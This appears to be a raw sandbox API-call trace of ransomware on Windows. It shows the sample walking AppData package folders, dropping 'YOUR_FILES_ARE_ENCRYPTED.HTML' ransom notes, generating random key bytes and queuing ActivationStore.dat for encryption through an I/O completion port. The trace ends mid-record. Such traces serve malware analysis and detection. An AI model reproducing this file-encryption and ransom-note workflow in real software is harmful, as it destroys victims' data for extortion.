[0120.895] GetProcessHeap () returned 0x600000 [0120.895] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.896] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.897] CloseHandle (hObject=0x320) returned 1 [0120.897] GetProcessHeap () returned 0x600000 [0120.897] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.897] GetProcessHeap () returned 0x600000 [0120.897] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.898] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0120.898] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.898] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState") returned 102 [0120.898] GetProcessHeap () returned 0x600000 [0120.898] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.898] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState" [0120.898] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\*" [0120.898] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.898] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.898] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.898] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.898] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0120.898] GetProcessHeap () returned 0x600000 [0120.898] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.899] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.900] CloseHandle (hObject=0x320) returned 1 [0120.900] GetProcessHeap () returned 0x600000 [0120.900] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.900] GetProcessHeap () returned 0x600000 [0120.900] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.900] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0120.900] StrStrIW (lpFirst="Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.900] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned 165 [0120.900] GetProcessHeap () returned 0x600000 [0120.900] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.900] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy" [0120.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*" [0120.901] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.901] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.901] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c2a33a7, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0120.901] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.901] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned 181 [0120.901] GetProcessHeap () returned 0x600000 [0120.901] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.902] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore" [0120.902] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*" [0120.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c31594e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.903] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c31594e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.903] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c551adc, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c551adc, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0120.903] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.903] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 201 [0120.903] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.903] lstrlenW (lpString=".dat") returned 4 [0120.903] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0120.903] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0120.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\microsoft.xboxgamecallableui_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0120.904] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0120.904] GetProcessHeap () returned 0x600000 [0120.904] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.906] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="7B") returned 2 [0120.906] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="97") returned 2 [0120.906] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="6F") returned 2 [0120.906] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="DE") returned 2 [0120.906] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="36") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="64") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="7A") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="CB") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="34") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="DC") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="58") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="71") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="54") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="F6") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="B2") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="F9") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C6") returned 2 [0120.906] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="F3") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="34") returned 2 [0120.907] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="48") returned 2 [0120.907] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="4A") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="C5") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="29") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="E8") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="C6") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="BB") returned 2 [0120.907] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="9B") returned 2 [0120.907] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="9E") returned 2 [0120.907] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="B8") returned 2 [0120.907] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="A3") returned 2 [0120.907] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="96") returned 2 [0120.907] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="4C") returned 2 [0120.907] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" [0120.907] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.907] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.907] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9c31594e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c31594e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c31594e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0120.907] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.908] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG1") returned 206 [0120.908] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.908] lstrlenW (lpString=".LOG1") returned 5 [0120.908] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0120.908] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9c31594e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c31594e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c31594e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.908] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.908] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat.LOG2") returned 206 [0120.908] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.908] lstrlenW (lpString=".LOG2") returned 5 [0120.908] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.908] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9c31594e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c31594e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9c31594e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.908] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.908] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 211 [0120.908] GetProcessHeap () returned 0x600000 [0120.908] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Microsoft.XboxGameCallableUI_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\microsoft.xboxgamecallableui_1000.10586.0.0_neutral_neutral_cw5n1h2txyewy\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.913] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.914] CloseHandle (hObject=0x324) returned 1 [0120.915] GetProcessHeap () returned 0x600000 [0120.915] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.915] GetProcessHeap () returned 0x600000 [0120.915] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.915] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c2a33a7, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9c2a33a7, 